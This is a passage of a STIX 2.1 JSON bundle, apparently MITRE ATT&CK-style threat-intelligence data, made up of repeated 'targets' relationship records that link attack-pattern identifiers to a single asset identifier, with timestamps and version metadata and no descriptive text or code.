"x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60542b4c-fb37-4695-838c-271eaddbfcfc", "created": "2024-07-01T10:37:15.836427", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836429", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5f6aeb4-fe9a-49b0-84a1-6a52eb30e086", "created": "2024-07-01T10:37:15.836437", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836439", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b147c2d9-45b7-437d-85aa-bd62603d14de", "created": "2024-07-01T10:37:15.836446", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836448", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3120da7a-1278-4819-b6a5-196e19dfafd8", "created": "2024-07-01T10:37:15.836456", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836458", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a8bc001-0232-4438-81e5-9e40f711f26b", "created": "2024-07-01T10:37:15.836465", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836468", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47edda8f-8d5f-40a5-ba96-974ce7d3822b", "created": "2024-07-01T10:37:15.836516", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836518", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a7ad9850-2d3b-4cbe-8a72-0ba584bdfafe", "created": "2024-07-01T10:37:15.836527", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836529", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--35da4947-1d0d-42e5-8155-7d9f2ad68599", "created": "2024-07-01T10:37:15.836537", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836539", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e76c118a-8e44-4ba3-9266-906504da4b7b", "created": "2024-07-01T10:37:15.836546", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836548", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea859c5c-5912-4670-a3d4-38cfa80bf9e2", "created": "2024-07-01T10:37:15.836556", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836558", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52ee99f3-1699-4b27-8f87-5d568428418d", "created": "2024-07-01T10:37:15.836565", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836567", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc1bf1be-8bc9-4427-927b-aa199c512acf", "created": "2024-07-01T10:37:15.836575", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836577", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--084c0124-fdad-4b61-8c6b-a632c5d41bdc", "created": "2024-07-01T10:37:15.836585", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836587", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6776881c-b0b3-4c23-8714-ab9da5dff046", "created": "2024-07-01T10:37:15.836595", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836597", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca318f19-619b-4cc1-925e-5253d1378f7b", "created": "2024-07-01T10:37:15.836604", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836606", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50f6dae6-d3b3-404f-a4df-d7a8074d7c4d", "created": "2024-07-01T10:37:15.836614", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836616", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--584bc6b5-8b61-48ef-a2a1-6bc7810a689e", "created": "2024-07-01T10:37:15.836624", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836626", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--daaf9592-0d8a-481b-a4c6-a58b5acb9e25", "created": "2024-07-01T10:37:15.836633", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836635", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c89b0cc9-9bfb-4ff4-aff4-dec20366149a", "created": "2024-07-01T10:37:15.836643", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836645", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7131f6d4-5c9f-4621-92fa-8ea5ddeb210a", "created": "2024-07-01T10:37:15.836652", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836655", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f46d5319-a7c3-4203-a528-e24d6d4712bc", "created": "2024-07-01T10:37:15.836662", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836664", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b5f8ad0-e423-4872-9924-d5a1412f00fb", "created": "2024-07-01T10:37:15.836672", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836674", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4bd22fa8-a631-4714-8c77-c8ab10f27e54", "created": "2024-07-01T10:37:15.836681", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836683", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23928e0e-805a-41d1-98de-9231a9f0427a", "created": "2024-07-01T10:37:15.836691", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836693", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f66dc5ec-882b-4d7b-a1e0-032454231782", "created": "2024-07-01T10:37:15.836701", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836703", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59724951-94e2-440a-bfc0-3f24f380a050", "created": "2024-07-01T10:37:15.836710", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836712", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08af2237-0589-445c-99a9-1f1f8030cfc6", "created": "2024-07-01T10:37:15.836720", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836722", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--44752426-51ee-4a2a-9dca-7b35cb0be2cb", "created": "2024-07-01T10:37:15.836730", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836732", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5bc1398-6dff-4a85-b90a-e22982461117", "created": "2024-07-01T10:37:15.836740", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836742", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46d4a32a-632e-4e2d-90bf-2890aeccaf5b", "created": "2024-07-01T10:37:15.836749", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836751", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53fa38b5-ba9c-4151-9e95-c97ba7862a7c", "created": "2024-07-01T10:37:15.836759", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836761", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b3365ed-8cb2-43f9-ac2a-f4148f0a53ae", "created": "2024-07-01T10:37:15.836768", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836770", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4493ee41-1a6b-43e6-9364-8991e8aec2bd", "created": "2024-07-01T10:37:15.836778", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836780", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c028987-aa7e-4c29-bcb2-fa96b8518e91", "created": "2024-07-01T10:37:15.836788", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836790", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--30dbe6db-5ed2-4e03-9a3e-45db3307c377", "created": "2024-07-01T10:37:15.836797", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836799", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a0350fc-9eb9-4933-9e77-46080c33e4b5", "created": "2024-07-01T10:37:15.836807", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836809", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--64011699-0ef9-43c5-960e-4b08a896c811", "created": "2024-07-01T10:37:15.836817", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836819", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c59c752f-1078-48d8-af9e-44fa5781b185", "created": "2024-07-01T10:37:15.836826", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836829", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a69686b8-b274-4eb4-a91d-4c1171328a4c", "created": "2024-07-01T10:37:15.836836", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836838", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53a7fe34-7996-42aa-a266-0424b4486c03", "created": "2024-07-01T10:37:15.836846", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836848", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52293e80-3873-4ebe-baf6-49453188f37a", "created": "2024-07-01T10:37:15.836855", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836857", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": 